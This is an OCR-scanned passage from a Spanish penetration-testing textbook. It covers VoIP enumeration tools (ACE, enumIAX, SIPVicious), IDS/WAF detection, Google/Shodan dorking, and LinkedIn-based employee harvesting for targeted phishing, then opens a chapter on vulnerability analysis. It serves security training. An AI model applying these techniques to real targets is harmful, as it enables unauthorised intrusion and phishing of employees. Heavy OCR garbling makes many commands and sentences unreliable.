- Modo de descubrimiento automático: “ace -i eth0 - m 00: 1E:F7:28:9C:8E " El argumento 
*-i" identifica la interfaz de escucha y el argumento “-т” la MAC del dispositivo a suplantar. 
Ambos son parámetros obligados para la ejecución de la herramienta. 
- Modo específico: “ace -i eth0 -t 192.168.10.150 -m 00:1E:F7:28:9C:8E" Además de 
los anteriores argumentos, se utiliza el argumento "-t" para especificar la dirección IP del 
servidor TFTP. 


El resto de argumentos opcionales habilitados para la herramienta son los siguientes: 
- "-c [0-1]": Argumento binario que determina el comportamiento en modo monitor (0) о 
en modo envenenador (1). 
- "v VLAN ID": Argumento que permite especificar el identificador del VLAN. 
- "-rinterfaz ": Elimina la interfaz VLAN. 
- "-y": Como en otras tantas herramientas, habilita el modo detallado o de depuración. 


enumIAX 

Del mismo modo que ACE está pensada para realizar la enumeración del directorio corporativo 
suplantando teléfonos Cisco Unified, enumIAX se trata de un enumerador por fuerza bruta de 
usuarios a través del protocolo /4X2, (Inter Asterisk Exchange versino2). 


enumIAX es capaz de realizar ataques de fuerza bruta bien basándose en un diccionario de nombres 
de usuario comunes o deducido a través de ingeniería social, o bien de manera secuencial. Este 
ültimo utiliza los caracteres definidos en el archivo charmap.h, por defecto se trata del rango 
alfanumérico, es decir, las letras de la “a” a la “7” y los números del “0” al “9”. El funcionamiento 
de esta herramienta, al igual que en el caso de la herramienta anterior, es muy sencillo: 


* Modo secuencial: “enumiax dirección ip objetivo -m 4 -M 8 -v", cómo se puede intuir, el 
primer argumento a pasar corresponde a la dirección IP del servidor LAX, el segundo, “-m”, a la 
longitud mínima del nombre de usuario, el tercero, “-M”, a la longitud máxima y el cuarto, "-v", 
como ya se comentó anteriormente, al modo detallado (este parámetro puede repetirse varias 
veces para incrementar el nivel de detalle de la salida de la herramienta). 


+ Modo diccionario: “enumiax dirección ip objetivo -d dict -v", en este caso también existen 
otros parámetros adicionales que pueden resultar de utilidad: 
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| = “i [0-9]+”: Permite indicarle а la herramienta el número de iteraciones que debe hacer 
- antes de guardar el estado de la sesión. Por defecto, si no se le indica lo contrario, trabajará 
con el valor 1000. 


“-s nombre_archivo”: Recupera el estado de una sesión anterior. 


ар es un escáner de red para SIP. De comportamiento similar a Nmap, escanea la red buscando 

jositivos y puertos específicos en base a los argumentos pasados por línea de comandos. Una 

que svmap encuentra un dispositivo que soporte SIP, extraerá la información de la respuesta e 
el tipo de dispositivo, La salida habitual del programa genera un listado de direcciones 

e dispositivos SIP y el nombre de los mismos. 

i 


funciona enviando un paquete uDP que contiene una petición SIP a un determinado rango de 
es IP especificado por el usuario, y a continuación lista aquellas respuestas SIP válidas. Este 
iento en teoría lo hace mucho más rentable que usar Nmap para los mismos propósitos 
n el blog del autor se presupone unas seis veces más rápido). 


gumentos básicos que necesita svmap para funcionar son una dirección IP que determine el 
de comienzo y otra dirección IP que lo acabe “хутар ipl-ip2”. En la Wiki de SIPVicious se 
ener un listado completo de todas las opciones, siendo las más interesantes los argumentos 
e permite especificar varios puertos o incluso un rango y la opción "-g " que activa la opción 


» como anteriormente ha sido comentado, se trata de otra de las herramientas de suite 
ous. Esta herramienta está diseñada para obtener los usuarios de una PBX o servidor VoIP. 


iento de esta herramienta está basado en la identificación de las extensiones válidas 
do por una serie de nümeros por defecto situados en los siguientes rangos: 


Desde 1000 aumentado en 1000 hasta llegar a 9000. 
desde 1001 aumentado en 1000 hasta llegar a 9001. 
desde 1111 aumentando en 1111 hasta llegar a 9999, 
desde 11111 aumentando en 11111 hasta llegar a 99999, 
desde 100 a 999 dé'un en uno. 

desde 1234, 2345 hasta 7890. 


nalmente y para evitar errores Svwar envía una respuesta ACK a las respuestas SIP con 
1200 debido al comportamiento de varios PBX que continúan enviado paquetes a la espera de 
dicha confirmación. 
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El funcionamiento de Svwar es tan sencillo como el de la herramienta predecesora, una vez que 
se obtiene una dirección IP válida, basta con ejecutar la herramienta pasándole exclusivamente la 
dirección IP del objetivo “svwar dirección IP". Aunque como era de esperar también es posible 
especificar un determinado rango o incluso utilizar un diccionario. La primera opción se realiza a | 
través del argumento “-е” y la segunda con el argumento “-d”. 


і 
IDS/IPS j | 
Los IDS (Intrusion Detection System), que significa “Sistema de detección de Intrusos” son | 


herramientas, generalmente basadas en hardware para evitar perdida en el rendimiento de la red, - 
diseñadas para detectar accesos no autorizados a un ordenador o red. | 


Por su parte, los IPS (Intrusion Prevention System), que obviamente significa "Sistema de prevención 
de Intrusos”, son considerados por algunos como una extensión de los IDS, y son en realidad otro 
tipo de control de acceso, más cercano a las tecnologías de cortafuegos. 
| 
1 


Los IDS basan su funcionamiento en heurística y patrones, mientras que los IPS lo basan en firmas, 
políticas de seguridad, anomalías y HoneyPor. 


Kali incorpora tres herramientas, ya mencionadas anteriormente, fragroute, fragrouter y wafw00f 
que en combinación con hping3 son capaces de detectar la existencia de IDS/IPS y estudiar su | 
comportamiento, 


Fragroute/Fragrouter | 
Las herramientas fragroute y fragrouter están diseñadas para interceptar, modificar y reescribir el 
tráfico de salida con destino a un determinado host. Implementan la mayoría de los ataques descritos 
en el paper Secure Networks “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion 
Detection” publicado en enero de 1998. | 

| 

| 


Varias de las aplicaciones prácticas de la herramienta podrían ser las siguientes: 
- Probar el tiempo límite y reensamblado de parámetros en 105 IDS de red. 
- Depurar paquetes TCP/IP. | 
- Probar la característica “state full" de un determinado firewall. 
- Evadir técnicas de detección de fingerprinting pasivo de S.O. | 


WAFWOOF 
La herramienta WAFWOQF está diseñada para realizar la identificación y fingerprinting de productos 
WAF encargados de proteger páginas web. En concreto la herramienta, hoy en día, es capaz de 
detectar hasta 22 tipos distintos de cortafuegos web. 


El funcionamiento de la herramienta ünicamente exige el paso como parámetro de la dirección web | 
a auditar, y tras realizar todas las pruebas pertinentes ofrecerá como respuesta el WAF que estima se 
encuentra al otro lado. 
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sive Footprinting 


Protocolo Whois 

es un protocolo TCP basado en petición/respuesta utilizado para efectuar consultas a una base 

d permitiendo determinar el propietario de un nombre de dominio o dirección IP püblica. 

Pradicionalmente dichas consultas han sido realizadas a través de la interfaz de línea de comandos, 
embargo actualmente existen multitud de páginas web diseñadas para realizar estas consultas. 


WHOIS information for nan: ++ 


Imagen 02.27: Ejemplo de los resultados de WHOIS. 


la imagen a modo de ejemplificar la información que puede ser obtenida a través de una 
o web. Como dato más interesante podría considerarse las direcciones de correo ya que 
тесеп información sobre dos de los dominios usados para el envío y la recepción de correos, 
en determinadas ocasiones también puede ser interesante los números de teléfono para 
T ataques de ingeniería social o las fechas, estas ültimas permitirían por un lado ser 

de suplantar la identidad del sitio web si el administrador o responsable se olvida de renovar 
Ito y por otro, más interesante desde el punto de vista de la defensa, los registros de páginas 
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web recientes y/o de corta duración, para ser consideradas como posibles páginas de spam y rastrear: 
al responsable de dicho registro para comprobar si hay más páginas similares registradas al mismo 
nombre. 


Otro aspecto interesante de esta técnica de descubrimiento pasivo consiste en el Whois Histórico, 
disponible de manera gratuita a través de páginas como who.is/whois.ws о de pago a través de 
domaintools.com (aparentemente presenta más información) que permite realizar un seguimiento de: 
aspectos como las distintas direcciones IP que há utilizado el domino. í 


Google/Bing Hacking 
Una de las herramientas pasivas de reconocimiento web y búsqueda de sitios web vulnerables más: 
interesantes consiste en el uso de los buscadores Bing y Google mediante el uso de búsquedas: 
avanzadas. Esta modalidad permite definir criterios como el tipo de página web a buscar según 
extensión, que contenga cierto segmento de texto en el título, que en el cuerpo de la página web 
aparezca tal texto, que la búsqueda se restringa a un determinado dominio o por el contrario ignore: 
todas las páginas web de un cierto grupo de dominios, etcétera. 


El uso de las búsquedas avanzadas como herramienta para los fines que aquí concierne es lo q 
se denomina Google Hacking y Bing Hacking respectivamente y es una de las técnicas usadas 
programas como Maltego. 


Johnny Long, aprovechándose de las capacidades de Google, creó una base de datos de büsquedas 
avanzadas conocida con el nombre de “Google Hacking Database”, la página web original se 
encuentra desactualizada, pero el proyecto continúa adelante en la web de Exploit Database en 
sección de Google Dorks (actualmente la tercera pestaña bajo la abreviatura de GHDB). 


ld бе сене a Gone chi rr 


Imagen 02.28: Pagina web de exploit database. 


Los operadores utilizados para tal fin son los siguientes: 
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= site: En la introducción se ha hecho referencia a este operador, es el encargado de restringir 
las búsquedas a un determinado dominio. 

- ip: Sólo disponible en Bing. Busca las páginas web que se encuentren en la dirección IP 
especificada. 

= idnurl/allinurl: Realiza la búsqueda contemplando aquellas páginas web en cuya dirección 
URL aparezcan los términos especificados. 

- intitle/allintitle: Del mismo modo que el anterior restringe el ámbito de la búsqueda a las 
páginas web que contemplen las palabras especificadas en el título. 


- link: Este operador busca páginas que enlazan a la página introducida a continuación. 
Г - ext: Busca las direcciones URL cuyos archivos acaben en la extensión especificada. 
= filetype: En Google tiene el mismo comportamiento que ext, sin embargo en Bing permite 
- buscar por el tipo de fichero indistintamente de la extensión que tenga. 
- « contains: En Bing ofrece la posibilidad de encontrar páginas con enlaces a ficheros con 
- una determinada extensión. 
intext: Al contrario que los otros dorks que están diseñados para buscar información en 
los elementos más auxiliares de la página web, este argumento obliga a buscar el mensaje 
- dentro del cuerpo de la página web. 
define: Google busca en las páginas donde entiende que se responde a la definición de la 
frase adjunta al dork. 


info: le indica a Google que busque información sobre la frase adjunta. 


is de las diferencias inferidas, entre Google y Bing. de la lectura de los operadores existen 
os a destacar como son el hecho obvio de que ambos indexan información diferente, 
a el contenido los archivos comprimidos o empaquetados y el número de búsquedas a 
antes de que salte la comprobación del CAPTCHA parece ser superior en Bing. 


n Hacking 

es un motor de búsqueda diseñado para buscar dispositivos y sistemas de ordenadores 
5 a Internet. A través de esta página (ShodanHO. сот), los auditores pueden encontrar gran 
de dispositivos conectados а la гей, сот pueden ser semáforos, cámaras de seguridad, 
de calefacción caseros, sistemas de control de parques acuáticos, gasolineras, centrales 
as, etcétera. Pueden incluso encontrase sistemas de control de centrales nucleares y del 
or de partículas cyclotron. La mayoría tienen seguridad y protección, sin embargo también 
tran muchos dispositivos con credenciales por defecto que pueden ser accedidos desde el 
0 navegador. 


ina web constantemente busca nuevos dispositivos accesibles püblicamente desde 
A y actualiza la información de los ya existentes. Está concentrado en sistemas SCADA, 
isoryCcontrol And Data Acquisiticion), que significa “Control de supervisión y adquisición 
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La búsqueda de datos se encuentra limitada a 10 elementos para usuarios anónimos, 50 elementos. 
para usuarios registrados y 10.000 elementos para aquellos que han pagado la subscripción. Además 
estos últimos tienen acceso a una serie de características como el uso de una API sin restricciones 
puntuales y consulta a través de Telnet у HTTPS. 


Al igual que Google y Bing, Shodan también soporta filtros para realizar búsquedas avanzadas. 
filtros básicos soportados son los siguientes: 
- city: permite especificar la ciudad. / 
- country: permite especificar las iniciales del país. 
- geo: permite especificar las coordenadas geográficas a partir de los datos de latitud 
longitud, adicionalmente soporta la adición de un tercer parámetro que especifique el nú 
de kilómetros alrededor del punto, por defecto 5. 


- hostname: permite especificar el nombre del host. 
- net: permite especificar la dirección IP del host. 
- оз: permite especificar el sistema operativo del host. 


- port: permite especificar un puerto en concreto de los 33 que soporta. (En la web Shoda 
es posible encontrar ayuda sobre los filtros para obtener más información acerca de ci 
son esos puertos). 


- before/after: permite especificar un rango de fechas de recolección de la información 
entre los que acotar la búsqueda. 


HTTP/1.0 2000K 
Connection: close 
Cache-Control: no-cache 
Server: SQ-WEBCAM 


Imagen 02.29: Ejemplo de los resultados de Shodan HQ. 
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‚о + Shodan 
vez estudiado el funcionamiento de Maltego se puede apreciar el potencial de la herramienta 
la fase de footprinting. Uno no puede evitar pensar en las altas capacidades y cómo sería si la 
pia herramienta fuese compatible con nmap, ShodanHO y, en general, con el resto de herramientas 
1s en el proceso de auditoría. 


o incorpora la opción de añadir nuevas transformadas, esto se puede hacer de tres formas 
bien actualizando desde el servidor oficial, bien añadiendo nuevos repositorios o bien 
lando transformadas y agregándolas de manera local. 


de ShodanHO sería la segunda de las formas anteriores, ShodanHQ posee una АРІ para 
г con la página web desde herramientas desarrolladas por terceros. Para ello tan sólo es 
rio estar registrado y obtener, de manera totalmente gratuita, el hash identificador de usuario 
rio para su funcionamiento. En la dirección URL ht1p://maltego.shodanhg.com/ se muestra el 
Ito a seguir, el cual consiste básicamente en añadir un nuevo repositorio, sincronizarlo y 
e las nuevas transformadas. 


p, en concreto, y para el resto de herramientas de scrip! en general, también existe la 
d mediante transformadas locales. Buscando en internet es posible obtener acceso a un 
п foro del año 2009 en el que muestran el procedimiento a seguir, pero parece ser que 
de a versiones anteriores del programa. No obstante, siempre queda la posibilidad de aprender 
niento del desarrollo de las transformadas y programarse manualmente la integración de 
entas anteriormente mencionadas, 


web Robtex está considerada como “La Navaja Suiza de Internet”. Esta página web 
lizar ciertas partes del procedimiento activo de footprinting de manera pasiva, es decir, 
e preguntar directamente a los servidores la información sobre sus dominios, subdominios, 
DNS, etcétera, permite obtener dicha información sin dejar rastro en el objetivo a través 


Imagen 02.30: Ejemplo de resultados obtenidos con Robrex. 


Como se puede apreciar en la imagen, la respuesta obtenida muestra enlaces a otras páginas de 
| como Alexa, rbls.org, WOT, información de los servidores DNS, etcétera. 
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Information Leakage 


En internet existen sitios web que podrían ser considerados como especialmente diseñados pi 
las fugas de información, un ejemplo de estos sitios son AnonPaste, Pastebin, Paste HTML, Pastie, 
etcétera. También se pueden encontrar otras webs pensadas para alojar código fuente de desarrollos. 
de libre acceso como Github o Google Code. 


Una de las herramientas utilizadas para recolectar información es Pastenum, por desgracia en el 
momento de escribir este capítulo no se encuentra disponible en Kali aunque como todas estas. 
herramientas su procedimiento de instalación es bastante sencillo, ha sido desarrollada por el equipo 
de “Corelan Team”. 


Al margen de la herramienta mencionada, buscar en estos “repositorios” se puede resumir еп 
hacer una búsqueda desde Google o Bing restringiendo el ámbito de la búsqueda a los sitios 
web anteriormente mencionados, además realizar dicho procedimiento permite en muchos casos 
saltarse los filtros de páginas como pastebin que al recibir una denuncia de uno de sus documen 
únicamente lo eliminan del resultado de la búsqueda in situ. 


Social Network Engineering 


Hoy en día, con el auge de las redes sociales para todo tipo de ámbitos, ocio, profesional, deporte, 
etcétera, muchas empresas tienen expuesto en internet sin saberlo, o al menos sin entender las: 
implicaciones que ello conlleva, datos privados de sus trabajadores. 


Por ejemplo, en Facebook a través del correo electrónico de la persona se puede acceder a su perfil. 
Tanto en Facebook como en Twitter los datos de los contactos de un determinado usuario son ci 
siempre públicos, en Linkedin se puede encontrar el curriculo de una persona así como también se 
puede consultar su grupo de contactos. Todo ello lleva a que sin ser consciente de ello se pue 
preguntar en Linkedin por “todos” los empleados de una empresa, obtener sus contactos, recurrir 
Facebook y a Twitter para obtener sus “pensamientos en voz alta” y parte de sus contactos dando. 
como resultado un más que jugoso grafo de los empleados de la empresa y las relaciones entre los 
mismos. | 
A partir de dicho grafo, у con un poco de la ayuda de Maltego y similares, es posible inferir un listado: 
de gran parte de los empleados de la empresa y preparar un ataque de spam altamente dirigido y 
segmentado, de manera que se podría hacer enviar un correo a un grupo de empleados utilizando la 
forma de hablar de un empleado ajeno al grupo que sea contacto/amigo de todos ellos solicitándole 
que acceda, por ejemplo, a una página en desarrollo de la propia empresa y que se identifiquen 
con sus credenciales internos, todo ello usando siempre recursos propios de la compañía y en una 
dirección URL que sea altamente confundible. | 


Para ilustrar el ejemplo anterior, supóngase una empresa X, si se realiza una búsqueda de dicha 


empresa en Linkedin con un usuario con privilegios básicos la información obtenida será similar a 
la siguiente: 
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de Linkedin. 
A ES 
АЁ Barcelona y жедефиез, España - Ocio, wages y 


Miembro de Linkedin 


ij | COMERCIAL on Шанаға S^ ELM 
diii, Madnd y alrededores, España - Осо. маин y turismo 


Miembro de Linkedin 


NES. enis Emm - 
NETS 


Imagen 02.31: Empleados en Linkedin. 


тареп se puede observar cómo gran parte de los empleados tienen sus datos protegidos de 

sin embargo si se hace una büsqueda personalizada en Google de la siguiente manera: 
in.com -inurl:/jobs/ nombre empresa" se obtiene un listado enorme en el que se muestra 
n claro de todos los empleados que trabajan, han trabajado o tienen contacto con algún 
que actualmente trabaja en dicha empresa y que pueden ser consultados accediendo desde 
Google. 


Web imágenes Maps Shopping Mis = 


Арсютәймтеме 750 restados 3 20 segunt] 


Imagen 02.32: Linkedin + берне Hacking. 
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Una vez se obtiene el listado de empleados tan “sólo” sería necesario buscar por el nombre 
cada uno de los empleados tanto en Twitter como en Facebook buscando el nombre de la empi 
en los perfiles y a partir de ese punto sería posible obtener no sólo datos como por ejemplo di 
viven los empleados, la fecha de nacimiento, sus gustos, sus opiniones, sus amigos, donde pasan 
vacaciones, etcétera sino además averiguar datos de otros empleados que si bien no tienen perfil 
Linkedin sí que tienen un perfil en una de las otras redes sociales compartido casi en exclusiva 
otros trabajadores de la misma empresa. 


Р 
En base a lo anterior, y siendo susceptible de añadir más redes sociales a la ecuación junto con el ш 
de las demás técnicas de footprinting, queda patente las posibilidades que conlleva para un atacant 
pentester/auditor planificar un ataque dirigido que ponga en jaque a una determinada organización. 


——— "т 
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Capítulo Ш 
s de Vulnerabilidades y ataques de 
contraseñas 


náli 


ulnerabilidad 


busca la definición a las palabras “vulnerabilidad” y “seguridad” es posible alcanzar una 
esión razonable sobre cuál puede ser el significado de una “vulnerabilidad de seguridad”. De 
га, es posible llegar a la conclusión de que una vulnerabilidad de seguridad es aquello que 
© ип posible vector de ataque contra un sistema, incluyendo aspectos сото el malware, sistemas 
configurados, contraseñas escritas en cualquier parte, etcétera. Obviamente aspectos como 
в aumentan el riesgo de un determinado sistema. Sin embargo, esta definición no es suficiente, 
mo señala Microsoft en uno de los artículos de la librería TechNet, resulta necesario exponer 
ісібп algo más amplia a la utilizada generalmente en la comunidad de seguridad. 


ición más correcta de vulnerabilidad sería la siguiente: 


erabilidad de seguridad es una debilidad en un producto que podría permitir a un usuario 
cionado comprometer la integridad, disponibilidad, o confidencialidad de dicho producto." 


ez expuesta la definición resulta necesario analizar el significado exacto de la misma. A 
ión se van a exponer cada una de las secciones de la definición y se aclarará mediante 
05 que permitan entender la forma en la que esta definición es aplicada a la vida real. 


= Debilidad: Las vulnerabilidades de seguridad implican la explotación de debilidades 
_ accidentales, estas debilidades generalmente aparecen por deficiencias en el diseño del 
producto. Sin embargo, estas deficiencias no siempre acaban desencadenando vulnerabilidades 
de seguridad. 

Ejemplos: La elección de implementar un cifrado de 40-bit en un producto no constituiría 
Una vulnerabilidad de seguridad, a pesar de que la protección que proporcione sea inadecuada 
Рага según qué propósitos. En contraste, un error de implementación que inadvertidamente 
| Causó un cifrado de 256-bit que descarte la mitad de los bits en la clave sí supondría una 
ulnerabilidad de seguridad. 
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- Producto: Las vulnerabilidades de seguridad son el resultado de un problema de ип 
producto. Los problemas que se derivan de la adhesión de normas imperfectas pero de amplia 
aceptación no constituyen vulnerabilidades de seguridad. 

Ejemplos: Un navegador que, al conectarse a un sitio FTP, inicializa la sesión enviando: 
las credenciales “en claro” no se considera que tenga un problema de seguridad, ya que la 
especificación FTP establece que se inicialicen las sesiones en texto plano. Sin embargo, si 
el navegador lleva a cabo sesiones SSL en texto plano, sí constituiría una vulnerabilidad de 
seguridad, ya que la especificación de SSL indica que esta debe tener las sesiones cifradas. 

- Integridad: La integridad hace referencia a la fiabilidad de un recurso. Un usuario 
malintencionado que explota una debilidad en un producto para modificarlo silenciosamente 
y sin autorización está comprometiendo la integridad del producto. 

Ejemplos: Una debilidad que permite a un administrador cambiar los permisos de cualquier. 
archivo no supondría un problema de seguridad puesto que un administrador ya posee dicha 
capacidad, Por el contrario, si una debilidad permitiese a un usuario sin privilegios llevar a 
cabo la misma acción, esto sí constituiría una vulnerabilidad de seguridad. 


- Disponibilidad: La disponibilidad se refiere a la posibilidad de acceder a un recurso. Un 

usuario malintencionado que explota una debilidad en un producto, negando el acceso de un 

usuario a dicho producto, está comprometiendo la disponibilidad del mismo. 

Ejemplos: Una debilidad que permite a un atacante provocar la caída de un servidor constituiría 

una vulnerabilidad de seguridad, puesto que el atacante sería capaz de regular si el servidor: 

es capaz de proveer servicios o no. Sin embargo, el hecho de que un atacante pueda enviar un: 

gran número de peticiones legítimas a un servidor y monopolizar los recursos no constituiria 

una vulnerabilidad de seguridad, siempre y cuando el operador del servidor sea capaz de 
controlar el sistema. 

- Confidencialidad: La confidencialidad hace referencia a la limitación del acceso a la 

información de un recurso exclusivamente a las personas autorizadas. Un atacante que explota 

una debilidad en un producto para acceder a la información no pública comprometería la 

confidencialidad de ese producto. 

Ejemplos: Una debilidad en un sitio web que permite а un visitante leer un archivo que no. 

debería poder leerse constituiría una vulnerabilidad de seguridad. Sin embargo, una debilidad 

que revele la ubicación física de un archivo no constituye una vulnerabilidad. Este hecho ` 
podría ser útil para fines de reconocimiento, y se podría utilizar junto con una vulnerabilidad 

de ingeniería social para comprometer los archivos. Por tanto por sí sola no permitiría a un 

atacante comprometer los datos, y no constituiría una vulnerabilidad de seguridad. 


Como puede verse, la integridad, la disponibilidad y la confidencialidad son los tres objetivos 
principales de la seguridad. Si se carece de uno o más de estos tres elementos, existe una vulnerabilidad 
de seguridad, y podrían quedar comprometidos uno o varios de estos elementos al mismo tiempo. 
Por ejemplo, una vulnerabilidad de fuga de información podría comprometer la confidencialidad de 
un producto, mientras que una vulnerabilidad de ejecución de código remoto podría comprometer 
su integridad, su disponibilidad y su confidencialidad. 
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apartado se presentan los aspectos principales que un análisis de vulnerabilidades debe 
Obviamente, esto dependerá de fases previas como la fase de recogida de información. 


ión se presentan unas imágenes relacionadas, que representa las ramas principales, tal y 
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Imagen 03.04: Fase de “Investigación” correspondiente al “Análisis de vulnerabilidades”. 


Pruebas 


El análisis de vulnerabilidades, tal y cómo se ha comentado en la definición, es el proceso de 
descubrir debilidades en los sistemas y aplicaciones que puedan ser aprovechadas por un atacante. 
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defectos pueden abarcar desde una mala configuración del equipo y servicios al diseño de 
iones inseguras. Aunque el proceso a seguir para buscar los defectos varía y depende en gran 
dida del componente particular a probar, existen aspectos fundamentales comunes al proceso. 


zar el análisis de una vulnerabilidad de cualquier tipo, el analista debe enfocar correctamente 
indidad y la amplitud de las pruebas de cara a cumplir con los objetivos y/o requisitos deseados. 

indidad incluye aspectos tales como la validación de los datos de entrada, los requisitos de 
cación, etcétera. Sea cual sea el ámbito de aplicación, las pruebas deben estar adaptadas para 
isfacer los requisitos de profundidad para alcanzar los objetivos, en consecuencia, la profundidad 
pruebas siempre debe ser validada para asegurar que los resultados de la evaluación satisfagan 
ectativas. Además de la profundidad, la amplitud también debe ser tomada en consideración 
se realizan los análisis de vulnerabilidades. Por su parte, la amplitud abarca aspectos tales 
las redes objetivo, segmentos de red, equipos, inventarios, etcétera. 


iplo, el caso más sencillo podría consistir en encontrar todas las vulnerabilidades en un 
o equipo, mientras que en otros casos más avanzados, podría consistir en encontrar las 
idades en una serie de equipos que cumplan una determinada condición. Por tanto, la 
tud siempre debe ser comprobada para asegurar que se ha cumplido con los objetivos y que no 
| dejado ningún equipo sin auditar. 


ebas activas requieren la interacción directa con el componente a auditar en busca de 
lidades de seguridad. Esto podría implicar componentes de bajo nivel, tales como la pila 
n un determinado dispositivo de red, o componentes de más alto nivel como una interfaz web 

administración del mismo. En base a lo anterior, hay dos formas distintas de interactuar con 
nponente de destino: automatizada y manual. 


tizada 

D automatizadas se basan en el uso de software encargado de escanear los servicios 
endo determinadas peticiones, examinan las repuestas y determinan la posible existencia de una 
idad. Este proceso automatizado reduce los requisitos de tiempo y costes laborales, pero 
será necesaria la comprobación por parte del auditor de los resultados obtenidos. 


j 
ientas de software se clasifican en cuafro categorías distintas: 


= Escáneres genéricos de vulnerabilidades de red: Este tipo de escáneres buscan identificar 
versiones de servicios con vulnerabilidades conocidas. Dentro de esta categoría se encuentran 
los escáneres de puertos, servicios y banners ya mencionados en el capítulo de footprinting. 
Escáner de aplicaciones web: Dentro de esta categoría se encuentran principalmente 
tipos de aplicaciones. Por un lado, aquellas que rastrean todos los enlaces del servidor 
indo cualquier posible inyección o mala configuración. Y por el otro lado se encuentran 
llos que llevan un listado de directorios y archivos asociados con una vulnerabilidad 
ocida. En este sentido hay que destacar Burp Suite mediante el uso del Spider y el Escáner 


Activo, exclusivamente disponible еп la versión de pago y la herramienta mencionada 
capítulo anterior, Nikto. 


- Escáner de vulnerabilidades de red: Dentro de esta categoría entra el análisis de protocol 
como el VPN y el IPv6. Esto se debe a que las herramientas de análisis tradicionales no est 
preparadas para trabajar con estos protocolos y se necesitan herramientas especializadas. 

- Escáner de redes de voz: Similar a la categoría anterior con la salvedad de que este ti, 0. 
protocolos se utiliza para transportar voz y se necesitan herramientas diseñadas para evalu 
aspectos como la posibilidad de capturar conversaciones o de suplantar llamadas telefónic; 


Conexión Manual Directa 

Como en cualquier otro proceso automatizado o tecnología, el margen de error y/o falsos positis 
Siempre está presente. En base a esto, siempre resulta recomendable hacer comprobaciones manual 
para validar los resultados de las pruebas automatizadas, así como la identificación de todos li 
posibles vectores de ataque y los puntos débiles previamente identificados. 


Ofuscado 

Otro aspecto a tener en cuenta a la hora de realizar la auditoría es la posible existencia de filtros ID 
IPS y WAF. Esto implica la necesidad de evitar un comportamiento regular y predecible por pat 
de las herramientas automatizadas de auditoría. Por ello existen diferentes técnicas como variar Kk 
nodos de salida, alternar entre objetivos, modificar ciertos campos de las peticiones, etcétera. 


Pasivo 


En este tipo de pruebas entran aquellas relacionadas con la recogida pasiva de informació 
comentada en el capítulo anterior, con la salvedad de que en esta fase de la auditoría no se busei 
enumerar información, si no analizar los mismos resultados buscando comportamientos sospecho 

o información confidencial en documentos que puedan suponer una vulnerabilidad en el sistema. 


Validación 


Correlación entre las herramientas 


Cuando se trabaja con varias herramientas surge la necesidad de correlación de los resultados, 

que puede llegar a ser complicada. La correlación de los elementos puede ser llevada a cabo de dos 
maneras distintas: la correlación específica y la correlación categórica. Ambas son útiles en funciór 
del tipo de información, métricas y estadísticas que se estén intentando obtener de un objetiv 
determinado. 


La correlación especifica hace referencia a una debilidad concreta definida en varios listados con 

ID de la vulnerabilidad, (entre estos IDs destacan el CVE, el OSVDB, y el índice personalizado de 
cada proveedor), esto es un problema conocido en un determinado software. Dichos identificadores 
de vulnerabilidades pueden ser agrupados en aspectos como el nombre del equipo, la dirección IB 
el FQDN, la dirección MAC, etcétera. Un ejemplo de esto resultaría al agrupar las vulnerabilidade: 
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en microfactores como el host en el que han sido halladas y el código СУЕ asignado a 
lidad. De hecho muchos escáneres de vulnerabilidades ofrecen esta posibilidad para 
tación de los resultados. 


бп categórica hace referencia a aspectos relacionados con estructuras de categorías, 
el caso de los marcos de cumplimiento (por ejemplo, NIST SP 800-53, DoD 5300 Series, 
|, guia OWASP, etcétera), que permite agrupar los elementos en macrofactores como el 

bilidad, errores de configuración, etcétera. Un ejemplo de este tipo de correlación 
todos los equipos encontrados con credenciales por defecto en el grupo que evalúa la 


los dos estilos de correlación presentados, se hace necesario insistir en la importancia 
enfoque centrado en demasía en microfactores podría ofrecer una sensación de riesgo 
mientras que otro que lo haga exclusivamente en los macrofactores podría dar la falsa 


s manuales específicas a cada protocolo 

mo se pudo observar en la fase de footprinting, cada protocolo necesita una herramienta 

y esamente para el mismo, un ejemplo de los protocolos más comunes a la hora de 

el análisis de vulnerabilidades son: 

- Servicio VPN: El análisis de este protocolo permitirá determinar debilidades tales como 
0 de claves precompartidas o un ID de grupo por defecto. 

Servicio Citrix: El análisis permitirá evaluar la posibilidad de enumerar el directorio de 

o de la organización. 

“Servicio DNS: Del mismo modo, la bist de zona se puede considerar tanto 
del proceso de recogida de información como una vulnerabilidad derivada de una mala 

figuración en los servidores DNS. 

— Servicios Web: En múltiples ocasiones es posible acceder a un mismo servicio web desde 

puertos en un mismo sistema, sin embargo muchos administradores de sistemas sólo 

en su esfuerzo en asegurar aquellos que corren por los puertos más comunes. 

п 

_ Servicio SMTP: Los servidores de со pueden ser vulnerables tanto a técnicas de 

eración de usuarios como a suplantación de los mismos mediante técnicas de SPAM o 
is de fuerza bruta contra la interfaz web. 


s de ataque 


d de documentar el progreso de explotación de las vulnerabilidades asegurándose de no 
ngün vector de ataque y, al mismo tiempo de evitar dañar la infraestructura a auditar, 
lir una serie de pautas: 


orar árboles de ataque resulta crucial para asegurar la precisión del informe final. El 
debe ser desarrollado y actualizado conforme se analizan nuevos sistemas y servicios, 
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y se identifican vulnerabilidades potenciales. Esto resulta especialmente importante d 

las fases de explotación. 

- Las pruebas en un laboratorio aislado, que constituya una réplica del entorno real, permi 
neutralizar el impacto de la ejecución de los exploits y al mismo tiempo asegurar con cie 
grado de certeza el impacto que dicha vulnerabilidad podría suponer a la organización. 

- Aunque las pautas anteriores sean necesarias, al final siempre resulta imprescindible 
confirmación visual en el sistema de destino de manera que se certifique la existencia 
dicha vulnerabilidad, d 


Investigación 


Investigación pública 

Tras la identificación de una vulnerabilidad en uno de los host objetivo, es necesario concretar li 
gravedad del problema. En muchos casos, dicha vulnerabilidad puede encontrase en un paqu 
de software de código libre, y en otros, puede ser una debilidad en un proceso de negocio, о 
error administrativo común como una mala configuración o uso de contraseñas por defecto, Ев! 
vulnerabilidades generalmente vienen detalladas en bases de datos de vulnerabilidades y/o en avi: 
de proveedores. 


Bases de datos de exploits y módulos de frameworks 

Muchas de las vulnerabilidades conocidas tienen exploits de disponibilidad pública asociados. Ев 
exploits pueden ser encontrados en diversas páginas webs que contienen bases de datos con los. 
exploits categorizados en función de la plataforma, del vector de ataque, de sus consecuencias, del 
identificador, etcétera. 


Del mismo modo, existen frameworks especializados en la explotación de vulnerabilidades, (dentro 
de los cuales destaca Metasploit), que disponen de una base de exploits que se sincroniza con sus; 
servidores y queda almacenada en el equipo. 


Contraseñas por defecto 

Con frecuencia, los administradores y técnicos eligen contraseñas débiles, no cambian la 
